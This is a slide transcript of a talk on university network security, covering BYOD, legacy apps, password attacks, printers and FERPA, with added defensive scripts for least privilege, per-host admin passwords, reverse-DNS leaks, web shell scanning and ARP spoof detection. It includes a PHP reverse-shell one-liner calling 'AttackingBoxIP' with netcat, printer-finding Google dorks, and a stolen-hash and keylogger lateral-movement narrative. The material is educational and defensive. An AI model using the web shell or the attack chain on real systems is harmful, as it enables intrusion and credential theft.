Transcript phukd

Adrian Crenshaw
http://Irongeek.com

I run Irongeek.com
I have an interest in InfoSec education
I don’t know everything - I’m just a geek with time on my hands
Sr. Information Security Engineer at a Fortune 1000
Co-Founder of Derbycon
http://www.derbycon.com
Twitter: @Irongeek_ADC

This is a broad subject, too broad
Give you something to think about
Going to try to suggest cheap/free tools to solve problems
More notes here:
http://www.irongeek.com/i.php?page=security/university-campus-security-2013

What are the differences?
Open by design
Lack of physical control
BYOD (Bring Your Own Device) is standard
Early Adoption/Legacy
Apps with little regard to security
Politics/Organizational Problems
Legal Stuff

Bandwidth
Free resources
 Botnets
 Pivots
 Free hosting
Books/Articles
 Aaron Swartz & JSTOR is a sad case of admins going too far
Research information
Grades/Tests/Notes
 Forced directory browsing for the win!

The point is to learn (in theory)
Learning is the product, not widgets or whatever
Experimentation is needed to learn

Can I run a service on this?
Where can I put my website?
Where can I run my code?
Try telling tenured faculty they can’t run a server?
Old software never dies
“But I just got to use this BASICA app”
 Time tables for testing
 Assumption of Admin access
Mitigation:
 Figure out which registry keys and file system paths the app actually needs to write, and grant only those instead of local admin
 Procmon (run the app as a standard user and filter on Result = ACCESS DENIED)
http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx
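Procmon shows which keys and files the app was denied, but turning a long export into a least-privilege ACL is tedious by hand. The script below is an added example (not from the talk): it reads a Procmon CSV export, keeps the ACCESS DENIED rows for the app's process, separates registry keys from file paths, and emits one icacls grant per denied file. The CSV rows, the process name legacyapp.exe and the paths are constructed for the example.

```python
import csv
import io

# Constructed sample of a Procmon CSV export (File > Save... > CSV), trimmed
# to Procmon's default columns. These rows are made up for this example;
# they are not from the talk. In Procmon, filter on "Result is ACCESS DENIED"
# and "Process Name is <app>" while running the app as a standard user.
SAMPLE_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","legacyapp.exe","1234","CreateFile","C:\\Program Files\\LegacyApp\\data.dat","ACCESS DENIED","Desired Access: Generic Write"
"10:01:02.2","legacyapp.exe","1234","RegOpenKey","HKLM\\SOFTWARE\\LegacyApp\\Settings","ACCESS DENIED","Desired Access: Set Value"
"10:01:02.3","legacyapp.exe","1234","CreateFile","C:\\Program Files\\LegacyApp\\legacy.ini","ACCESS DENIED","Desired Access: Generic Write"
"10:01:02.4","legacyapp.exe","1234","CreateFile","C:\\Program Files\\LegacyApp\\data.dat","ACCESS DENIED","Desired Access: Generic Write"
"10:01:02.5","legacyapp.exe","1234","CreateFile","C:\\Program Files\\LegacyApp\\app.exe","SUCCESS","Desired Access: Read Data"
"10:01:03.0","explorer.exe","900","RegQueryValue","HKCU\\Software\\Microsoft\\Windows","SUCCESS","Type: REG_SZ"
"""

REGISTRY_ROOTS = ("HKLM\\", "HKCU\\", "HKCR\\", "HKU\\", "HKCC\\")


def denied_paths(csv_text, process_name):
    """Map each path the named process was denied to the access it asked for."""
    denied = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        if row["Result"] != "ACCESS DENIED":
            continue
        denied.setdefault(row["Path"], set()).add(row["Detail"])
    return denied


def split_paths(denied):
    """Registry keys get their ACL fixed in regedit or a GPO; files can use icacls."""
    keys = sorted(p for p in denied if p.upper().startswith(REGISTRY_ROOTS))
    files = sorted(p for p in denied if not p.upper().startswith(REGISTRY_ROOTS))
    return files, keys


def icacls_commands(files, principal="BUILTIN\\Users"):
    """One icacls grant per denied file: Modify (M) on that file only, instead of
    the whole Program Files tree, which is what making the user admin amounts to."""
    return ['icacls "%s" /grant "%s:M"' % (path, principal) for path in files]


def least_privilege_plan(csv_text, process_name):
    """Full pipeline: (icacls commands to run, registry keys to fix by hand)."""
    files, keys = split_paths(denied_paths(csv_text, process_name))
    return icacls_commands(files), keys


if __name__ == "__main__":
    cmds, keys = least_privilege_plan(SAMPLE_CSV, "legacyapp.exe")
    print("\n".join(cmds))
    print("Registry keys that need Set Value for the app's users:", *keys, sep="\n  ")
```

Run the app through every feature users actually exercise before exporting; an app that only fails on save will not show its denied paths until someone saves. Re-run Procmon after applying the grants to confirm the ACCESS DENIED list is empty.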

Frequent nuke and rebuilds
 SteadyState – no longer supported
 Achieving the effect with built-in tech
http://technet.microsoft.com/en-us/library/gg176676%28WS.10%29.aspx
Commercial
 Deep Freeze
http://www.faronics.com
 Alternatives
http://alternativeto.net/software/deep-freeze/

Besides crappy apps, there is malware
Nuke it from orbit, it’s the only way to be sure
Symantec Ghost
Open Source Alternatives:
http://www.osalt.com/ghost
Train users to put their files in a known location
Windows Easy Transfer
http://windows.microsoft.com/en-us/windows7/products/features/windows-easy-transfer


Attackers are already on the soft chewy center of
the “Candy Analogy”
Remember the axiom:
“If a bad guy has unrestricted physical access to
your computer, it's not your computer anymore.“
~ Microsoft or Dr. David Salomon

Password Resets
Password Bypass
Pass the Hash
Password Cracking

Offline NT Password & Registry Editor, Bootdisk/CD
http://pogostick.net/~pnh/ntpasswd/
Bart's PE Builder
http://www.nu2.nu/pebuilder
Windbuilder
http://reboot.pro
Sala's Password Renew
http://www.sala.pri.ee
NTPWEdit
http://cdslow.webhost.ru/en/ntpwedit/

Kon-Boot
http://www.piotrbania.com/all/kon-boot/
Subverts the boot process
Lets you log in to Windows with a blank password, without changing the stored one
Reboot and authentication goes back to normal
Some locally stored passwords will not work (anything protected with the user’s real password, e.g. via DPAPI, stays unreadable because the password was bypassed, not recovered)
Nirsoft’s Password Recovery tools:
http://www.nirsoft.net

Portable Boot Devices (USB/CD/DVD)
http://www.irongeek.com/i.php?page=videos/portable-boot-devices-usb-cd-dvd
Building a boot USB, DVD or CD based on Windows 7 with WinBuilder and Win7PE SE Tutorial
http://www.irongeek.com/i.php?page=security/winbuilder-win7pe-se-tutorial
Dual booting Winbuilder/Win7PE SE and Backtrack 5 on a USB flash drive with XBOOT
http://www.irongeek.com/i.php?page=videos/xboot-backtrack-winbuilder-dual-boot


Some may be thinking:
"Those are just the patron access machines - my
staff workstations and file servers are still safe
because they are behind locked doors."
Let me share my little horror story about network
privilege escalation:
1. First frat boy Bob becomes a local admin on a workstation using a boot device.
2. He then copies off the SAM and SYSTEM files for later cracking with Cain or Hashcat
http://www.oxid.it/cain.html
http://hashcat.net
I've done tons of videos/articles over the years on password cracking, so I'll point you to some of those:
Cracking Windows Vista/XP/2000/NT Passwords via SAM and SYSKEY with Cain, Ophcrack, Saminside, BKhive, Samdump2 etc
http://www.irongeek.com/i.php?page=security/cracking-windows-vista-xp-2000-nt-passwords-via-sam-and-syskey-with-cain-ophcrack-saminside-bkhive-etc
Password Exploitation Class
http://www.irongeek.com/i.php?page=videos/password-exploitation-class
3. Many folks use the same local admin password on all of the boxes they deploy, allowing Bob to attack other boxes from across the network using the cracked credentials.
4. Bob then installs a software key logger to gain even more credentials as faculty, staff and students log in to the compromised workstation.
5. Repeat, leapfrogging across the network.

Pass the Hash
Metasploit's psexec
http://www.metasploit.com/
Pass the Hash Tool Kit
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Pass-The-Hash_Toolkit

Cached Domain Credentials
 MSCash and MSCash v2
http://openwall.info/wiki/john/MSCash
http://openwall.info/wiki/john/MSCash2
 Cain & Abel
http://www.oxid.it/cain.html
 Hashcat
http://hashcat.net
Browser, Mail Client, etc.
 Nirsoft’s tools
http://www.nirsoft.net


Don’t store local passwords
Don’t use LM hashes
 New OS, or passwords of 15 characters or more (an LM hash is only stored for passwords of 14 characters or fewer)
 More on passwords in a bit
No default local admin password; use one that is custom per machine (HASH(MAC+SK))
Locked BIOS / Unified Extensible Firmware Interface (UEFI)
 Control what people can boot from
 Support issues for reimaging
Better lock the case too
 Cheap lock = crap lock
 Prohibitively expensive to do better
None of it stops hardware key loggers
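The per-machine local admin password the slide abbreviates as HASH(MAC+SK) is what breaks step 3 of Bob's leapfrog: cracking one box's hash no longer opens the rest. The code below is an added example, not the talk's own implementation. It assumes the site secret lives in a vault or the help desk tool, never on the image, and it uses HMAC-SHA256 keyed with that secret rather than a plain hash of the concatenation (an assumption of this example), so a password recovered from one box reveals nothing about the key or about other hosts. The MAC addresses and key in the main block are constructed.

```python
import base64
import hashlib
import hmac
import re


def normalize_mac(mac):
    """Canonicalize to 12 lowercase hex digits so '00:11:22:AA:BB:CC',
    '00-11-22-aa-bb-cc' and '001122aabbcc' all yield the same password."""
    digits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if len(digits) != 12:
        raise ValueError("MAC address must contain 12 hex digits: %r" % mac)
    return digits


def local_admin_password(mac, site_key, key_version=1, length=20):
    """Per-machine local admin password derived from the MAC and a site secret.

    HMAC-SHA256 keyed with the site secret (this example's construction, not
    necessarily the talk's exact one) stands in for HASH(MAC+SK). The MAC is
    public, so all of the security rests on the key; keying the HMAC with it
    means a recovered password from one box gives no foothold on the key or
    on other hosts. key_version is mixed in so rotating the secret changes
    every password. Output is URL-safe base64 (A-Z, a-z, 0-9, - and _):
    20 characters is 120 bits, typeable, and long enough that no LM hash is
    ever stored for it.
    """
    message = ("%s:v%d" % (normalize_mac(mac), key_version)).encode()
    digest = hmac.new(site_key, message, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(digest).decode()[:length]


def password_table(macs, site_key, key_version=1):
    """What a help desk lookup tool would show: MAC -> password for a list of hosts."""
    return {mac: local_admin_password(mac, site_key, key_version) for mac in macs}


if __name__ == "__main__":
    # Constructed inventory and key; the real key comes from a vault, never the image.
    site_key = b"replace-with-a-long-random-secret-kept-off-the-image"
    for mac, pw in password_table(["00:11:22:AA:BB:CC", "00:11:22:AA:BB:CD"], site_key).items():
        print(mac, pw)
```

Two caveats a practitioner would want: anyone holding the site key can compute every host's password, so the key needs the same handling as a domain admin credential; and a NIC swap changes the MAC and therefore the password, so the imaging process has to set it at deploy time rather than once. Random per-host passwords escrowed in the directory (the approach Microsoft's later LAPS tool took) remove the single shared secret entirely.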

Even professors from Comp Sci/Infosec may not know tech details
 Defining pen-test to two Infosec professors
 Defining what a USB hub was to another
Silly attitudes:
"Additionally, Mr. Crenshaw's personal website, housed on university resources, is a compendium of links to known computer hacker websites, hacker toolkits, and other hacker resources." ~ Larry Mand
The word hacker freaks them out a bit

Sterling Riggs, WDRB, Facebook post, September 26:
“I don't know how I feel about this--DerbyCon happening at Hyatt downtown. It's a convention for computer hackers.”
Lots of prejudicial comments
I pointed it out to my infosec buds on Twitter, and tons of Infosec folks showed up to defend hackerdom and the conference
Post since deleted
But Jayson E. Street (@jaysonstreet) saved some
Eve Adams got in the last words I saw:
"Kill em with kindness. Hack em with hugs."

Ethics, or lack thereof
 You get fired for what you do, not for what you don’t.
 Why rock the boat?
Tenure
 No, you change your IP scheme
 How do you enforce rules on those that can’t be fired?
Like high school cliques, but with more grey hair and tweed

The plural of anecdote is not evidence, but…
The Foundation for Individual Rights in Education
http://thefire.org
Look over the timeline for the Jerry Sandusky case
Look up the origin of the Clery Act
No, not all schools are this way (I hope)

They have always been doing it, they just did not have a term for Bring Your Own Device
Flat networks
NAC (Network Access Control)
 Better be more than a MAC address check (ifconfig or MadMACs makes spoofing one trivial)
 Crapware on the box: needs to check system AV and patch level
 http://www.packetfence.org
 http://freenac.net (maybe dead)

Remote password attacks
 Noisy
 Slow
Default passwords
 No passwords are common on printers
 Network gear
 Webcams/Teleconference
 DRACs

Printers
 Data leaks/Docs
 DoS
 Free print jobs
 Stored passwords
DRACs (or other management)
Webcams/Teleconferencing
 Remote control
 Passwords on desks?
SoHo NASes


Softperfect’s NetScan
http://www.softperfect.com/products/networkscanner/
RAWR (Rapid Assessment of Web Resources) from Adam Byers & Tom Moore (@RapidWebEnum)
http://sourceforge.net/projects/rawr-webenum/


http://www.exploit-db.com/google-dorks/
Examples:
Ricoh Savins
intitle:"web image monitor" site:edu
"/web/user/en/websys/webArch/mainFrame.cgi"
site:edu
inurl:"/en/sts_index.cgi" site:edu
HP Jetdirects (Varies greatly from model to model)
inurl:hp/device/this.LCDispatcher site:edu
CUPS Connected Printers
inurl:":631/printers" -php -demo site:edu

Some scanners will just tell you
THC-Hydra
http://www.thc.org/thc-hydra/
Medusa
http://www.foofus.net/~jmk/medusa/medusa.ht
Brutus
http://www.hoobie.net/brutus/
Default Password Lists (or just Google)
http://www.phenoelit.org/dpl/dpl.html
http://www.cirt.net/passwords

Default password of a new account?
Passwords reused too often, known by too many, never changed
Frequent resets cause people to write them down (or more support calls)
Password patterns
Passphrases over passwords:
 27^40 = 1.7970103e+57 (a 40-character passphrase from 26 lowercase letters plus space)
 95^10 = 5.9873694e+19 (a 10-character password from all 95 printable ASCII characters)
https://xkcd.com/936/

Facebook started on university campuses
Students are way too free with information
OSInt, Cyberstalking, Footprinting and Recon:
Getting to know you
http://www.irongeek.com/i.php?page=videos/osint
-cyberstalking-footprinting-recon
Curious George Bronk

How many organizations of about 7000 people have a class B?
Got in early, got a lot of space
Don’t have to NAT for numbering reasons, so a lot of stuff is on the public Internet
Some problems:
 Open ports on everything!
 Reconfigure devices
 Reverse DNS gives away naming conventions, departments and even usernames, e.g.:
nmap -sL 123.123.*.*
Nmap scan report for pm-cser-loanbox.papermill.edu (123.123.104.120)
Nmap scan report for pm-sscs-hh10500.papermill.edu (123.123.104.121)
Nmap scan report for pm-buse-jsmith02.papermill.edu
Nmap scan report for npi10adab.papermill.edu (123.123.118.67)
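A list scan (-sL) sends nothing to the targets; it only asks your own resolver for PTR records, so an attacker can map a whole class B this way without touching a single host. The parser below is an added example (not from the talk) showing what that output hands over: it groups hosts by the department prefix in the name, pulls out names that look like <dept>-<unit>-<user>NN, and flags anything that smells like out-of-band management. The nmap output, hostnames and addresses in it are constructed in the style of the slide; papermill.edu is the talk's stand-in domain.

```python
import re
from collections import defaultdict

# Constructed nmap -sL output in the style of the slide. papermill.edu is the
# talk's stand-in campus; these hostnames and addresses are made up for this
# example. In practice: nmap -sL 123.123.0.0/16 > listscan.txt
SAMPLE_NMAP_SL = """\
Starting Nmap 6.40 ( http://nmap.org )
Nmap scan report for pm-cser-loanbox.papermill.edu (123.123.104.120)
Nmap scan report for pm-sscs-hh10500.papermill.edu (123.123.104.121)
Nmap scan report for pm-buse-jsmith02.papermill.edu (123.123.104.122)
Nmap scan report for pm-buse-jsmith02-laptop.papermill.edu (123.123.104.123)
Nmap scan report for npi10adab.papermill.edu (123.123.118.67)
Nmap scan report for 123.123.118.68
Nmap scan report for idrac-bio-srv3.papermill.edu (123.123.120.9)
Nmap done: 7 IP addresses (0 hosts up) scanned in 0.50 seconds
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
# Named hosts print "name (ip)"; hosts with no PTR record print the bare ip.
REPORT = re.compile(r"^Nmap scan report for (?:(\S+) \((%s)\)|(%s))$" % (IPV4, IPV4))


def parse_list_scan(text):
    """(ip, hostname or None) for every 'Nmap scan report for' line."""
    hosts = []
    for line in text.splitlines():
        m = REPORT.match(line.strip())
        if m:
            name, ip, bare_ip = m.groups()
            hosts.append((ip or bare_ip, name))
    return hosts


def naming_conventions(hosts, separator="-"):
    """Group hostnames by their first two labels (pm-cser, pm-buse, ...): the
    department/building scheme that reverse DNS hands to anyone who asks."""
    groups = defaultdict(list)
    for _, name in hosts:
        if name:
            label = name.split(".")[0]
            parts = label.split(separator)
            groups[separator.join(parts[:2])].append(label)
    return dict(groups)


def likely_usernames(hosts):
    """<dept>-<unit>-<user>NN style names (jsmith02) leak account names.
    Heuristic: the third label is letters followed by one to three digits."""
    users = set()
    for _, name in hosts:
        if name:
            parts = name.split(".")[0].split("-")
            if len(parts) >= 3:
                m = re.match(r"^([a-z]+)\d{1,3}$", parts[2])
                if m:
                    users.add(m.group(1))
    return sorted(users)


def management_interfaces(hosts):
    """Addresses whose names hint at out-of-band management (DRAC/iLO/IPMI):
    exactly the boxes the default-password slides are worried about."""
    hints = ("drac", "ilo", "ipmi", "bmc")
    return sorted(ip for ip, name in hosts if name and any(h in name.lower() for h in hints))


if __name__ == "__main__":
    hosts = parse_list_scan(SAMPLE_NMAP_SL)
    for prefix, names in sorted(naming_conventions(hosts).items()):
        print("%-12s %d host(s): %s" % (prefix, len(names), ", ".join(names)))
    print("probable usernames:", likely_usernames(hosts))
    print("management interfaces:", management_interfaces(hosts))
```

The defensive use is the same script run against your own space: if the output reads like an org chart, the fix is boring PTR names for workstations and no names at all for management interfaces, which also means the "Reconfigure devices" item above.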

Firewall it off
Turn it off
Watch for defaults when sharing files
 Things get shared with too many folks
 NetScan is awesome for finding these
 Do they really need it?
Walled-off experimentation labs
 Virtual machines

User training
Who’s an admin?
SOHO NAS, and why are they there?

Anyone doing it?
Open Source Helpers
Graylog2
http://graylog2.org
OSSIM
http://sourceforge.net/projects/os-sim
Security Onion
http://securityonion.blogspot.com

Does the page allow for scripting?
Packages kept up to date
Old web apps never die
PHP example (a one-line web shell that calls back to the attacker; -e needs a netcat build that supports it, and "cmd" implies a Windows host):
<?php $x = shell_exec("nc AttackingBoxIP 30 -e cmd"); ?>
Web Shells
http://www.irongeek.com/i.php?page=videos/oisf2013/webshells-history-techniques-obfuscation-and-automated-collection-adrian-crenshaw
OWASP (Open Web Application Security Project)
https://www.owasp.org
Web Application Pen-testing Tutorials With Mutillidae
http://www.irongeek.com/i.php?page=videos/web-application-pen-testing-tutorials-with-mutillidae
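Because old web apps never die, the practical question for a campus web admin is how to find a shell like the PHP one-liner above once it has been dropped into some forgotten department site. The scanner below is an added example (not from the talk): it scores PHP source against a small indicator list (command execution functions, eval of a decoded payload, request data, netcat with -e, spliced string literals) and reports files over a threshold. The sample web root, file names and weights are constructed for the example; tune the weights to your own code base, since legitimate admin scripts call exec() too.

```python
import re

# Constructed sample web root: a legitimate page, the slide's one-liner dropped
# into an upload directory, an obfuscated eval shell, and two near-misses.
# None of these are from a real site; they exist only to exercise the scanner.
SAMPLE_FILES = {
    "index.php": "<?php echo 'Welcome to the department page'; ?>",
    "uploads/img.php": '<?php $x = shell_exec("nc AttackingBoxIP 30 -e cmd"); echo $x; ?>',
    "lib/cache.php": "<?php eval(base64_decode($_POST['q'])); ?>",
    "lib/help.php": "<?php $f = $_GET['f']; include($f); ?>",
    "lib/str.php": "<?php $a = 'ba' . 'se64_decode'; echo $a; ?>",
}

# (weight, label, pattern). The weights are this example's judgement call.
INDICATORS = [
    (5, "command execution", re.compile(r"\b(shell_exec|system|passthru|exec|popen|proc_open)\s*\(", re.I)),
    (5, "eval of decoded payload", re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\b", re.I)),
    (3, "eval", re.compile(r"\beval\s*\(", re.I)),
    (3, "request data in file", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")),
    (4, "netcat with -e (reverse shell)", re.compile(r"\bnc\b.*\s-e\s", re.I)),
    (2, "backtick shell operator", re.compile(r"`[^`]+`")),
    (2, "spliced string literal (obfuscated name)", re.compile(r"'[a-z0-9_]+'\s*\.\s*'[a-z0-9_]+'", re.I)),
]


def score_file(source):
    """Return (score, [labels]) for one file's source text."""
    score, labels = 0, []
    for weight, label, pattern in INDICATORS:
        if pattern.search(source):
            score += weight
            labels.append(label)
    return score, labels


def scan(files, threshold=5):
    """Files scoring >= threshold, worst first: {path: (score, labels)}."""
    scored = {path: score_file(src) for path, src in files.items()}
    flagged = {p: r for p, r in scored.items() if r[0] >= threshold}
    return dict(sorted(flagged.items(), key=lambda item: -item[1][0]))


if __name__ == "__main__":
    for path, (score, labels) in scan(SAMPLE_FILES).items():
        print("%2d  %-18s %s" % (score, path, ", ".join(labels)))
```

Run it over a web root with os.walk and feed each .php file's text to score_file; a PHP file under an upload directory that scores anything at all is worth a look regardless of threshold, because nothing executable should be there in the first place.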


Corporate networks can get away with more because of the physical perimeter (sort of)
Insecure protocols
 HTTP
 FTP
 SMTP
 Telnet

Password sniffing
Files/Print jobs
Cookie/session hijacking
Common sniffing tools
 Wireshark
http://www.wireshark.org
 NetworkMiner
http://www.netresec.com/
 Cain
http://www.oxid.it/cain.html
 Ettercap
http://ettercap.github.io/ettercap/

Protocol replacements
IDS/IPS/ARPWatch
LAN segmentation
Network Sniffers Class for the Kentuckiana ISSA 2011
http://www.irongeek.com/i.php?page=videos/network-sniffers-class
Static ARP
 ARPFreeze
http://www.irongeek.com/i.php?page=security/arpfreeze-static-arp-poisoning
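ARPWatch and static ARP are the two detect/prevent halves of the same problem, and the logic behind both fits in a few dozen lines. The code below is an added example (not from the talk or from ARPWatch's source): it replays a trace of ARP replies, raises the events ARPWatch calls "flip flop" (an IP changing MAC), checks replies against a pinned table of the kind ARPFreeze builds, and flags one MAC answering for several IPs, which is what a poisoner doing a gateway/victim MITM looks like. The trace and the addresses are constructed; in practice the tuples would come from tcpdump -e arp or a sniffer.

```python
from collections import defaultdict

# Constructed ARP reply trace: (timestamp, sender_ip, sender_mac). Made up for
# the example. Feed it from "tcpdump -e -n arp" or a capture in real use.
SAMPLE_ARP_REPLIES = [
    (1.0, "10.0.0.1", "00:11:22:33:44:01"),   # real gateway
    (1.5, "10.0.0.25", "00:11:22:33:44:25"),  # a workstation
    (2.0, "10.0.0.1", "00:11:22:33:44:01"),
    (2.1, "10.0.0.1", "de:ad:be:ef:00:99"),   # someone else claims to be the gateway
    (2.2, "10.0.0.25", "de:ad:be:ef:00:99"),  # ...and the workstation: classic MITM
    (2.5, "10.0.0.1", "00:11:22:33:44:01"),   # real gateway answers again (flip-flop)
    (3.0, "10.0.0.42", "00:11:22:33:44:42"),
]

# What an ARPFreeze-style static table would pin on every workstation.
STATIC_ARP = {"10.0.0.1": "00:11:22:33:44:01"}


def detect_arp_anomalies(replies, pinned=None):
    """Return a list of (timestamp, kind, subject, detail) alerts."""
    pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    last_seen = {}               # ip -> MAC most recently claimed for it
    claimed = defaultdict(set)   # ip -> every MAC that has ever claimed it
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        if ip in pinned and mac != pinned[ip]:
            # A static entry would have ignored this reply; report it anyway.
            alerts.append((ts, "pinned-mismatch", ip, mac))
        if ip in last_seen and last_seen[ip] != mac:
            alerts.append((ts, "flip-flop", ip, mac))   # ARPWatch's "flip flop"
        last_seen[ip] = mac
        claimed[ip].add(mac)
    # One MAC claiming several IPs is the poisoner's signature (proxy ARP on a
    # router is the legitimate exception; whitelist it if you run one).
    ips_by_mac = defaultdict(set)
    for ip, macs in claimed.items():
        for mac in macs:
            ips_by_mac[mac].add(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.append((None, "one-mac-many-ips", mac, sorted(ips)))
    return alerts


def static_arp_commands(pinned):
    """The ARPFreeze idea as commands: pin gateway/servers so poisoned replies
    are ignored. 'arp -s' exists on Windows and Linux (Windows wants the MAC
    with dashes; newer Windows prefers netsh interface ipv4 add neighbors)."""
    return ["arp -s %s %s" % (ip, mac) for ip, mac in sorted(pinned.items())]


if __name__ == "__main__":
    for alert in detect_arp_anomalies(SAMPLE_ARP_REPLIES, STATIC_ARP):
        print(alert)
    print("\n".join(static_arp_commands(STATIC_ARP)))
```

Static entries only protect the host they are set on, and on a campus LAN the attacker's own box is not going to cooperate; the detector is what tells you it is happening, and segmentation limits how many hosts share the broadcast domain with Bob in the first place.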
Do you know what is out there?
 Professors, students and staff could be hooking anything up
 NAC may give some info
 Nmap
http://nmap.org
 Nagios
http://www.nagios.org
Commercial:
 Nessus
http://www.tenable.com
 Nexpose
http://www.rapid7.com

Better than it used to be
 WSUS great for Windows clients you control
http://technet.microsoft.com/en-us/windowsserver/bb332157.aspx
Commercial:
 Shavlik
http://www.shavlik.com
 Secunia CSI (can be used with WSUS)
http://secunia.com
Open Source:
 http://wsuspackagepublisher.codeplex.com

Open wireless can be sniffed (duh!)
Lots of legacy systems exist that may not be able to use WPA/2 Enterprise (getting better)
VPN over open WiFi was a common option
Not so useful:
 Disabling SSID broadcasting
 MAC address filtering
Evil twin attacks

Universities hit everything across the board
Most of these others in the audience will know better than I
PCI DSS (Payment Card Industry Data Security Standard)
HIPAA/HITECH (Health Insurance Portability and
Accountability Act / Health Information Technology for
Economic and Clinical Health Act)
FISMA/FIPS (Federal Information Security Management Act
of 2002 / Federal Information Processing Standards)
IRB (Institutional Review Board)
FERPA (Family Educational Rights and Privacy Act)

Let’s dive into this
Turn off the video now

Three main parts
1. Give students access to their records
2. The ability to amend records
3. To control disclosure of student records
Only for schools getting money from U.S. Department of Education programs
Why it is pretty fucking useless!

No individual right to sue
 See Gonzaga University v. Doe
Can’t find a case of any university ever losing funding because of a breach
 Have there been no breaches?
 Just not enforced?
Two quotes:
"If, as a result of the hearing, the school still decides not to amend the record, the eligible student has the right to insert a statement in the record setting forth his or her views"
"Thus, while FERPA affords eligible students the right to seek to amend education records which contain inaccurate information, this right cannot be used to challenge a grade or an individual's opinion, or a substantive decision made by a school about a student."
Amendment clause has exceptions (that cover all possibilities)
 Grades
 Statements or Opinions
 “Substantive” Decisions
 What is left?
Overall conclusion: FERPA has no teeth

Mostly links, sorry
Slides will be up when I post the video, but most are in the article
If your experiences are different, I’d love to hear them
Private/State/Commercial
Teaching vs. Research
Government Research
Derbycon
Sept ?th-?th, 2014
Derbycon Art Credits to DigiP
Photo Credits to KC (devauto)
http://www.derbycon.com
Others
http://www.louisvilleinfosec.com
http://skydogcon.com
http://hack3rcon.org
http://outerz0ne.org
http://phreaknic.info
http://notacon.org
Twitter: @Irongeek_ADC